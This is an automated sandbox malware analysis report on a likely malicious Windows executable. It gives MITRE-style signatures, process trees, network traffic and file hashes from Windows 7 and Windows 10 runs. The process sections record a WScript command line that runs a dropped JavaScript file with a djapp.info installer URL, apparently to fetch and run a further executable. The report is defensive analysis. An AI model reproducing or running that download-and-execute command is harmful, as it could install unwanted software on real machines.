Malware Analysis Report

2025-08-05 22:21

Sample ID 240611-fdqdkavhlm
Target 9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118
SHA256 60c1fa3596584a9dd18663cf5f312f25cae53171c14a040f093081475659a1bd
Tags
execution
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

SHA256

60c1fa3596584a9dd18663cf5f312f25cae53171c14a040f093081475659a1bd

Threat Level: Likely malicious

The file 9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118 was found to be: Likely malicious.

Malicious Activity Summary

execution

Blocklisted process makes network request

Checks computer location settings

Unsigned PE

Command and Scripting Interpreter: JavaScript

Enumerates physical storage devices

Program crash

Suspicious use of WriteProcessMemory

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-11 04:45

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-11 04:45

Reported

2024-06-11 04:48

Platform

win7-20240215-en

Max time kernel

121s

Max time network

127s

Command Line

"C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe"

Signatures

Command and Scripting Interpreter: JavaScript

execution

Enumerates physical storage devices

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1288 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1288 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1288 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1288 wrote to memory of 1700 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1288 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1288 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1288 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1288 wrote to memory of 2580 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1288 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1288 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1288 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1288 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1288 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1288 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1288 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1288 wrote to memory of 2000 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1288 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1288 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1288 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1288 wrote to memory of 2092 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1288 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WerFault.exe
PID 1288 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WerFault.exe
PID 1288 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WerFault.exe
PID 1288 wrote to memory of 1484 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf114F.js" http://www.djapp.info/?domain=RUrFqPGNEK.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf114F.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf114F.js" http://www.djapp.info/?domain=RUrFqPGNEK.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf114F.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf114F.js" http://www.djapp.info/?domain=RUrFqPGNEK.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf114F.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf114F.js" http://www.djapp.info/?domain=RUrFqPGNEK.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf114F.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf114F.js" http://www.djapp.info/?domain=RUrFqPGNEK.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf114F.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1288 -s 556

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.djapp.info udp
US 8.8.8.8:53 bi.downthat.com udp
US 3.94.41.167:80 bi.downthat.com tcp
US 8.8.8.8:53 www.hugedomains.com udp
US 172.67.70.191:443 www.hugedomains.com tcp
US 3.94.41.167:80 bi.downthat.com tcp
US 172.67.70.191:443 www.hugedomains.com tcp
US 3.94.41.167:80 bi.downthat.com tcp
US 172.67.70.191:443 www.hugedomains.com tcp
US 3.94.41.167:80 bi.downthat.com tcp
US 172.67.70.191:443 www.hugedomains.com tcp
US 3.94.41.167:80 bi.downthat.com tcp
US 172.67.70.191:443 www.hugedomains.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\fuf114F.js

MD5 3813cab188d1de6f92f8b82c2059991b
SHA1 4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb
SHA256 a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e
SHA512 83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OOWQLMJV\domain_profile[1].htm

MD5 a11395f7801c68fc08a42adb49b4965e
SHA1 0c74ca1cdff73ee75d673be8392f684cb940424a
SHA256 0f0872262930f542ec7bc30f72ff445d2b4746cf09559dbea45f5d0d0e9313b8
SHA512 3311e87431fa28cd668fabbd20616587edf18e7f4b4f57a54bbc5e4f3b341be21b8aa5cb63f24402623ffb1af99fd2b3d45fbb67ee7580122487857e525a916d

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\NI3ZJXGP.txt

MD5 80b3ebbd38856710320e1b7fd40f95c8
SHA1 4d92012155fa1c890a8f957c5c62ba9fc815cdcb
SHA256 31b02e14b8accdfdeeeb386b7ce02c875343d32051f3a530b242888c9697e666
SHA512 fa488fcfea6783af2f4fa8ecf0fac39076f29cfaea930892999404df5778898ad8bd2347c6b56a909ab40877e2752ac507b3a905d4645c9c19dcd05e37544f8d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 99ea8df7fc53ad6cf1911727b0792df3
SHA1 4bf99bdab1bb518d68d6348656ab1fe99026e523
SHA256 fb5d2e21e58711e3397f66d7ba1a54e85785176a5d7496827e18cde5ee0fa297
SHA512 f50c8feb6278ab5ad97c75d90de275f985f190a008c6f42c5393f269373890ee22e0f29babbd146dc6f139c1cdd5608ddb19223664e060ac0e52d9c5c3790e58

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 8f0cf3b71a451da3e7af0bb4e0bb4ffd
SHA1 5575484c9272d9fed909e90939b89fa877fe409a
SHA256 0adc93cc3123c74a31ccb8beb4817f2c9211429540defd2d107403035b18bfd0
SHA512 852b96c736cd8203ce2e16f7e18862d49cbdd7acaa347d9df3fdf76c0d5b44ef4b12c1160ba86722a95ef595d0b37e78c4d489cf480af12a0fa4c9ecf07e38ae

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 8202a1cd02e7d69597995cabbe881a12
SHA1 8858d9d934b7aa9330ee73de6c476acf19929ff6
SHA256 58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5
SHA512 97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

MD5 de9270c4fb4e097ccfcaf6aae02263e7
SHA1 6464fd7978f85caa0b5009870c2bdece33b416f5
SHA256 499b51512a779635f5f17495011fae2970879395c31223ef0cc4553de77ca93e
SHA512 44a5ad9b6055801bbea6445cd4c6a429296948df152c005527437a57a726c7dad28ea8762d6265b8443b2ccc63ae4e2a892fccd028ea534a0a75868043a12292

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

MD5 61442f25854d3a90e776e2858a8d179d
SHA1 17ba1314fc0778a6e8df6dc17d14ca93515d91bd
SHA256 bca86280bbd294f04935238e52545a2e9f6f1b22c66695b4f0f937857476e9a8
SHA512 682278934ce25bdf5a2751d95d7c15b4edf4e42e5ec40ed824a539fbdac4b11fa611e2d9723d9c138ecb66529e5275ac229c6f6df936f4adb856943b16dd9fde

C:\Users\Admin\AppData\Local\Temp\Cab40C8.tmp

MD5 ac05d27423a85adc1622c714f2cb6184
SHA1 b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256 c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA512 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\902LKC6A\domain_profile[1].htm

MD5 497c745764e5e2f5a2f758a154447563
SHA1 b2d90a47d3cba6be321dbef5517db4d707d81383
SHA256 0c791e92516955d33748798234a3bde2e89aafd7d7332bc4b002e68d28ee1e79
SHA512 d9be8e7638fd93acfd46014c5d382d52cadef4936a2a66ac5e4cad4cfe4772cb89cfe610566323f2bf9700d4c9d73c367b920b2dea26f9c40800f05cb2fdee58

C:\Users\Admin\AppData\Local\Temp\Tar5909.tmp

MD5 9c0c641c06238516f27941aa1166d427
SHA1 64cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA256 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OOWQLMJV\domain_profile[1].htm

MD5 6c4a2100fac8650c3e091f14b67f66dc
SHA1 27ac6da44057312d651c360720da64213fe54f10
SHA256 73b4bbbb8724207a4298fede2ece8df65a3581e3cd27b3220d3a15663bbce86c
SHA512 9da9629c43c3dfe7fa8e96384638d469b5b8e7a7798e407712eac7d9696e395c5d388d4e9f390ba2ae2ff4f926a81a31be630b098bf7bbff90da9f9b854642d4

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\902LKC6A\domain_profile[1].htm

MD5 5d2897dbff252c55f28a7934e1281a71
SHA1 2965d8a0dc07e4760db0683fe2ff1d782130ebde
SHA256 e72115813298377ab36616a7cbfa996b691a4d704966604ce47017ebd954a436
SHA512 098554ed37dc00580dce916941ce71b52874a8382e4aa9c54349b15bdfaa93a54855b2223831f8e497b27d93f45f314ec836d077b41dc5ba45473321146f0be5

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-11 04:45

Reported

2024-06-11 04:48

Platform

win10v2004-20240226-en

Max time kernel

141s

Max time network

160s

Command Line

"C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe N/A

Command and Scripting Interpreter: JavaScript

execution

Enumerates physical storage devices

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1964 wrote to memory of 3616 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1964 wrote to memory of 3616 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1964 wrote to memory of 3616 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1964 wrote to memory of 4152 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1964 wrote to memory of 4152 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1964 wrote to memory of 4152 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1964 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1964 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1964 wrote to memory of 2336 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1964 wrote to memory of 4608 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1964 wrote to memory of 4608 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1964 wrote to memory of 4608 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1964 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1964 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe
PID 1964 wrote to memory of 1076 N/A C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe C:\Windows\SysWOW64\WScript.exe

Processes

C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\9d03368e2dfb77a719e37f486e94dbe0_JaffaCakes118.exe"

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4031.js" http://www.djapp.info/?domain=RUrFqPGNEK.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf4031.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4031.js" http://www.djapp.info/?domain=RUrFqPGNEK.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf4031.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1416 --field-trial-handle=3240,i,13319578961094268484,16557498665191861597,262144 --variations-seed-version /prefetch:8

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4031.js" http://www.djapp.info/?domain=RUrFqPGNEK.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf4031.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4031.js" http://www.djapp.info/?domain=RUrFqPGNEK.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf4031.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf4031.js" http://www.djapp.info/?domain=RUrFqPGNEK.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=9q1opzVAHsghhTV-SOcnWOwca5fw5gybmGYrhLIFYhQHEQsz6e6qfPLEmXdyGgix3Tqr4GalSgGsoNclYUM4DqI4b3y6Vo5aO-U80ZFrtNDGKRBo-hQF1R2seAl3nMN3bAunQF C:\Users\Admin\AppData\Local\Temp\fuf4031.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 1964 -ip 1964

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1964 -s 1452

Network

Country Destination Domain Proto
GB 96.16.110.114:80 tcp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 10.160.77.104.in-addr.arpa udp
US 8.8.8.8:53 www.djapp.info udp
US 8.8.8.8:53 bi.downthat.com udp
US 18.119.154.66:80 bi.downthat.com tcp
US 8.8.8.8:53 www.hugedomains.com udp
GB 142.250.187.234:443 tcp
US 8.8.8.8:53 66.154.119.18.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 13.107.246.64:443 tcp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 www.djapp.info udp
US 18.119.154.66:80 bi.downthat.com tcp
US 172.67.70.191:443 www.hugedomains.com tcp
US 8.8.8.8:53 191.70.67.172.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 www.djapp.info udp
US 18.119.154.66:80 bi.downthat.com tcp
US 172.67.70.191:443 www.hugedomains.com tcp
US 8.8.8.8:53 www.djapp.info udp
US 18.119.154.66:80 bi.downthat.com tcp
US 8.8.8.8:53 www.djapp.info udp
US 18.119.154.66:80 bi.downthat.com tcp
US 172.67.70.191:443 www.hugedomains.com tcp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 17.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\fuf4031.js

MD5 3813cab188d1de6f92f8b82c2059991b
SHA1 4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb
SHA256 a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e
SHA512 83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76